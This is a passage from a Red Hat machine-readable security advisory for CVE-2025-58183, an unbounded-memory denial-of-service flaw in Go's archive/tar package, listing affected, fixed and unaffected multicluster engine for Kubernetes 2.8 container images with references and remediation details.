"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
